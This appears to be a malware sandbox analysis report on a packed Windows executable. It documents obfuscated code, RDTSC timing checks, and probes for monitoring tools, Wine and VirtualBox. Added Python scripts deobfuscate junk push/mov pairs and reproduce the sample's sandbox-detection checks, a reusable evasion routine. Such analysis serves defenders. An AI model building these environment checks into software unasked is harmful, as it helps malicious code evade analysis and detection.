Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01013A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_01013A50
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0100CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 1_2_0100CAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\I74U08BM.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 39%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1774080 > 1048576
Source: file.exe | Static PE information: Raw size of yuaygcvc is bigger than: 0x100000 < 0x197400

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.ff0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuaygcvc:EW;tibvwtje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuaygcvc:EW;tibvwtje:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01016390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_01016390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1be33d should be: 0x1bb697
Source: file.exe | Static PE information: section name: (unnamed)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (unnamed)
Source: file.exe | Static PE information: section name: yuaygcvc
Source: file.exe | Static PE information: section name: tibvwtje
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0147514E push edx; mov dword ptr [esp], ebx 1_2_0147520C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0147514E push 00B5FB1Fh; mov dword ptr [esp], edi 1_2_01475217
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0142E953 push 3CF3B868h; mov dword ptr [esp], eax 1_2_0142E9BF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebp; mov dword ptr [esp], eax 1_2_013A3127
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 64E7C170h; mov dword ptr [esp], ebx 1_2_013A3298
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebx; mov dword ptr [esp], 797B4233h 1_2_013A32EB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebx; mov dword ptr [esp], 6FFC07EDh 1_2_013A3327
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 5BF40EA7h; mov dword ptr [esp], esp 1_2_013A3398
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 62FDDA22h; mov dword ptr [esp], ebx 1_2_013A3415
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebp; mov dword ptr [esp], edx 1_2_013A344D
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebp; mov dword ptr [esp], eax 1_2_013A350F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push eax; mov dword ptr [esp], edi 1_2_013A3537
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 43B56F05h; mov dword ptr [esp], esp 1_2_013A3696
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 3095A3EAh; mov dword ptr [esp], ecx 1_2_013A36AB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 4177696Fh; mov dword ptr [esp], ebx 1_2_013A36C1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push esi; mov dword ptr [esp], edx 1_2_013A3737
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 6ED7A760h; mov dword ptr [esp], ebx 1_2_013A37C5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 38E9686Ah; mov dword ptr [esp], esp 1_2_013A3839
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 254F17FFh; mov dword ptr [esp], edx 1_2_013A3910
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push eax; mov dword ptr [esp], ebp 1_2_013A3946
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ecx; mov dword ptr [esp], 9F3470B6h 1_2_013A3972
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push edx; mov dword ptr [esp], ebp 1_2_013A39EA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebp; mov dword ptr [esp], edx 1_2_013A39F4
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebx; mov dword ptr [esp], 7F91D59Ah 1_2_013A3A8E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push eax; mov dword ptr [esp], esi 1_2_013A3C3F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebp; mov dword ptr [esp], ecx 1_2_013A3C4E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push 779F1502h; mov dword ptr [esp], eax 1_2_013A3CF9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ebx; mov dword ptr [esp], 7F76F154h 1_2_013A3CFE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 push ecx; mov dword ptr [esp], eax 1_2_013A3DA7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push eax; mov dword ptr [esp], ecx1_2_013A3DD9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push edx; mov dword ptr [esp], 169316CEh1_2_013A3DFC
              Source: file.exeStatic PE information: section name: yuaygcvc entropy: 7.953931532068962
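The "push X; mov dword ptr [esp], Y" pairs listed above are an obfuscated plain push: the value X is dead the moment the following mov overwrites the slot the push created, so each pair is just "push Y" with a junk immediate or register thrown in to defeat pattern matching. The Python below is an added illustration, not part of the Joe Sandbox report or of the sample; it parses four of the findings (copied verbatim from the list above, the only report data in the block) and emits the equivalent instruction. It deliberately marks the rewrite as inexact when Y is esp, because a native push esp stores the pre-push stack pointer while this pair stores the post-push one. The regular expression, function names and the "exact" flag are this example's own assumptions.

```python
import re

# Four "Code function" findings copied verbatim from the report above (the only report data here).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0147514E push edx; mov dword ptr [esp], ebx1_2_0147520C",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0147514E push 00B5FB1Fh; mov dword ptr [esp], edi1_2_01475217",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebx; mov dword ptr [esp], 797B4233h1_2_013A32EB",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 5BF40EA7h; mov dword ptr [esp], esp1_2_013A3398",
]

# "Code function: <function> push <junk>; mov dword ptr [esp], <real><address>"; the extracted
# report fuses the trailing address onto the operand, so the whitespace before it is optional.
LINE_RE = re.compile(
    r"Code function: (?P<function>\d+_\d+_[0-9A-Fa-f]{8}) "
    r"push (?P<junk>\S+?); mov dword ptr \[esp\], (?P<real>\S+?)\s*"
    r"(?P<address>\d+_\d+_[0-9A-Fa-f]{8})$"
)

REGISTERS = {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"}


def collapse(junk, real):
    """Peephole rule: 'push junk; mov [esp], real' stores real into the slot the push just
    created, so junk is dead and the pair behaves like 'push real' (neither touches flags).
    Exception: real == esp. A native 'push esp' stores the pre-push esp, whereas this pair
    stores the post-push esp (4 less), so that rewrite is only approximately right."""
    if real.lower() == "esp":
        return "push esp", False
    return "push " + real, True


def deobfuscate(line):
    """Parse one report finding and return the collapsed instruction with its provenance."""
    m = LINE_RE.search(line)
    if m is None:
        raise ValueError("not a push/mov finding: %r" % line[-60:])
    equivalent, exact = collapse(m.group("junk"), m.group("real"))
    return {
        "function": m.group("function"),
        "address": m.group("address"),
        "original": "push %s; mov dword ptr [esp], %s" % (m.group("junk"), m.group("real")),
        "equivalent": equivalent,
        "exact": exact,
        "real_is_register": m.group("real").lower() in REGISTERS,
    }


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        row = deobfuscate(line)
        print("%s @ %s: %-42s -> %s%s" % (row["function"], row["address"], row["original"],
                                          row["equivalent"], "" if row["exact"] else "  (esp: off by 4)"))
```

Feeding the whole list of findings through deobfuscate gives the real push sequence of function 1_2_013A3123, which is what you want to read when comparing the unpacking stub against a clean build.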

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Code function: 1_2_01016390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_01016390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_1-25722
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
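The window-class probes above (FilemonClass, PROCMON_WINDOW_CLASS, RegmonClass) and the two registry probes (HKEY_CURRENT_USER\Software\Wine, HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__) are the sample's look for Sysinternals monitoring tools, Wine and a VirtualBox guest. The Python script below is an added example, not part of the Joe Sandbox report or of the sample; it reproduces those checks so an analyst can run it on the analysis VM before detonation and see which artifacts the sample will find. Only the class names and key paths come from the findings; the function names, the case-insensitive matching (the report shows both RegmonClass and Regmonclass being searched) and the "any hit means detected" verdict are this example's assumptions about the sample's logic. The live_* functions need Windows; the pure functions run anywhere on constructed input.

```python
import sys

# Probe targets copied from the findings above (the only report data in this block).
ANALYSIS_WINDOW_CLASSES = {"FilemonClass", "PROCMON_WINDOW_CLASS", "RegmonClass"}
SANDBOX_REGISTRY_KEYS = [
    ("HKEY_CURRENT_USER", r"Software\Wine"),
    ("HKEY_LOCAL_MACHINE", r"HARDWARE\ACPI\DSDT\VBOX__"),
]


def matching_windows(window_classes):
    """Class names from window_classes that belong to a monitoring tool. Matching ignores
    case because the report shows the sample searching both 'RegmonClass' and 'Regmonclass'."""
    wanted = {name.lower() for name in ANALYSIS_WINDOW_CLASSES}
    return sorted({name for name in window_classes if name.lower() in wanted})


def matching_registry_keys(present_keys):
    """present_keys: (hive, subkey) pairs that exist on the host; returns the probed keys among them."""
    present = {(hive.upper(), sub.lower()) for hive, sub in present_keys}
    return [(hive, sub) for hive, sub in SANDBOX_REGISTRY_KEYS
            if (hive, sub.lower()) in present]


def evasion_verdict(window_classes, present_keys):
    """Assumed decision rule: a single hit is enough to treat the host as an analysis box
    (the report shows the probes, not the exact rule the sample applies)."""
    result = {
        "windows": matching_windows(window_classes),
        "registry": matching_registry_keys(present_keys),
    }
    result["detected"] = bool(result["windows"] or result["registry"])
    return result


def live_window_classes():
    """Enumerate top-level window classes with EnumWindows/GetClassNameW (Windows only)."""
    if sys.platform != "win32":
        raise OSError("window enumeration needs the Win32 user32 API")
    import ctypes
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    WNDENUMPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p)
    user32.EnumWindows.argtypes = [WNDENUMPROC, ctypes.c_void_p]
    user32.GetClassNameW.argtypes = [ctypes.c_void_p, ctypes.c_wchar_p, ctypes.c_int]
    names = []

    @WNDENUMPROC
    def collect(hwnd, lparam):
        buf = ctypes.create_unicode_buffer(256)
        if user32.GetClassNameW(hwnd, buf, 256):
            names.append(buf.value)
        return 1  # keep enumerating

    user32.EnumWindows(collect, None)
    return names


def live_registry_keys():
    """Open each probed key the way the sample does and return the ones that exist (Windows only)."""
    if sys.platform != "win32":
        raise OSError("registry probing needs winreg")
    import winreg
    hives = {"HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER,
             "HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE}
    found = []
    for hive, sub in SANDBOX_REGISTRY_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(hives[hive], sub))
            found.append((hive, sub))
        except OSError:
            pass
    return found


if __name__ == "__main__":
    try:
        verdict = evasion_verdict(live_window_classes(), live_registry_keys())
    except OSError:
        # Off Windows: a constructed snapshot resembling a VirtualBox guest with Procmon open.
        verdict = evasion_verdict(["Shell_TrayWnd", "PROCMON_WINDOW_CLASS"],
                                  [("HKEY_LOCAL_MACHINE", r"HARDWARE\ACPI\DSDT\VBOX__")])
    print(verdict)
```

A non-empty "windows" list on the analysis VM means the tool should be closed (or run under a renamed build) before the sample starts; a hit on the VBOX__ DSDT key is a hypervisor artifact that only a patched VirtualBox build or a bare-metal sandbox avoids.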
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240075 second address: 1240079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240079 second address: 124007F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124007F second address: 123F93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c jmp 00007F76D8B73103h 0x00000011 popad 0x00000012 push dword ptr [ebp+122D0025h] 0x00000018 pushad 0x00000019 mov bx, AC91h 0x0000001d mov eax, 4CCD7585h 0x00000022 popad 0x00000023 call dword ptr [ebp+122D1C60h] 0x00000029 pushad 0x0000002a jmp 00007F76D8B73103h 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D204Bh], eax 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F76D8B73102h 0x00000040 mov dword ptr [ebp+122D2AB0h], eax 0x00000046 jng 00007F76D8B73114h 0x0000004c mov esi, 0000003Ch 0x00000051 jne 00007F76D8B730F7h 0x00000057 cld 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c cmc 0x0000005d lodsw 0x0000005f jbe 00007F76D8B730F7h 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a xor dword ptr [ebp+122D204Bh], ebx 0x00000070 mov esi, 138C6E61h 0x00000075 popad 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jo 00007F76D8B7310Bh 0x00000080 jmp 00007F76D8B73105h 0x00000085 nop 0x00000086 jp 00007F76D8B73104h 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f jnp 00007F76D8B730FCh 0x00000095 jc 00007F76D8B730F6h 0x0000009b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123F93B second address: 123F942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB24F second address: 13AB255 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123F921 second address: 123F93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76D9315E56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F76D9315E5Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B376A second address: 13B3781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B73101h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3781 second address: 13B378B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D9315E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B76 second address: 13B3B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76D8B730FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F76D8B730F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B96 second address: 13B3B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B9A second address: 13B3B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B9E second address: 13B3BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3BA4 second address: 13B3BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B570D second address: 123F921 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D9315E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b xor dword ptr [esp], 5B2B25ACh 0x00000012 jbe 00007F76D9315E56h 0x00000018 jns 00007F76D9315E5Ch 0x0000001e mov dword ptr [ebp+122D2EA2h], ecx 0x00000024 push dword ptr [ebp+122D0025h] 0x0000002a call dword ptr [ebp+122D1C60h] 0x00000030 pushad 0x00000031 jmp 00007F76D9315E63h 0x00000036 xor eax, eax 0x00000038 mov dword ptr [ebp+122D204Bh], eax 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jmp 00007F76D9315E62h 0x00000047 mov dword ptr [ebp+122D2AB0h], eax 0x0000004d jng 00007F76D9315E74h 0x00000053 mov esi, 0000003Ch 0x00000058 jne 00007F76D9315E57h 0x0000005e cld 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 cmc 0x00000064 lodsw 0x00000066 jbe 00007F76D9315E57h 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 pushad 0x00000071 xor dword ptr [ebp+122D204Bh], ebx 0x00000077 mov esi, 138C6E61h 0x0000007c popad 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jo 00007F76D9315E6Bh 0x00000087 jmp 00007F76D9315E65h 0x0000008c nop 0x0000008d jp 00007F76D9315E64h 0x00000093 pushad 0x00000094 push eax 0x00000095 push edx 0x00000096 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5790 second address: 13B579D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F76D8B730F6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B579D second address: 13B57C5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D9315E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnl 00007F76D9315E64h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B57C5 second address: 13B5844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 jnl 00007F76D8B730FCh 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 je 00007F76D8B730FCh 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pop eax 0x00000021 push edi 0x00000022 cld 0x00000023 pop ecx 0x00000024 push 00000003h 0x00000026 mov dx, bx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F76D8B730F8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov edx, 7250DEAAh 0x0000004a and si, 99D8h 0x0000004f push 00000003h 0x00000051 cmc 0x00000052 push E2979A9Ah 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a jmp 00007F76D8B73104h 0x0000005f pop edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5844 second address: 13B587F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F76D9315E56h 0x00000009 jp 00007F76D9315E56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 22979A9Ah 0x00000019 mov ch, 6Eh 0x0000001b lea ebx, dword ptr [ebp+12449669h] 0x00000021 mov esi, dword ptr [ebp+122D28B4h] 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F76D9315E61h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B587F second address: 13B5884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5884 second address: 13B588A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B59D0 second address: 13B5A06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D8B73104h 0x00000008 jmp 00007F76D8B730FEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jns 00007F76D8B73102h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A06 second address: 13B5A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A0C second address: 13B5A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A12 second address: 13B5A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5AA7 second address: 13B5B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B73105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dl, 8Ah 0x0000000f mov ecx, dword ptr [ebp+122D2B90h] 0x00000015 push 00000000h 0x00000017 movsx edx, cx 0x0000001a call 00007F76D8B730F9h 0x0000001f jmp 00007F76D8B73103h 0x00000024 push eax 0x00000025 jmp 00007F76D8B730FAh 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f pushad 0x00000030 ja 00007F76D8B730F6h 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 jno 00007F76D8B73100h 0x0000003f popad 0x00000040 mov eax, dword ptr [eax] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F76D8B730FAh 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5B26 second address: 13B5B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F76D9315E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5BD4 second address: 13B5BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F76D8B730F8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5BE4 second address: 13B5C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F76D9315E5Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F76D9315E62h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F76D9315E5Ch 0x00000021 pop eax 0x00000022 xor dword ptr [ebp+122D1BC5h], eax 0x00000028 lea ebx, dword ptr [ebp+1244967Dh] 0x0000002e or dx, 9F05h 0x00000033 xchg eax, ebx 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jno 00007F76D9315E56h 0x0000003d rdtsc
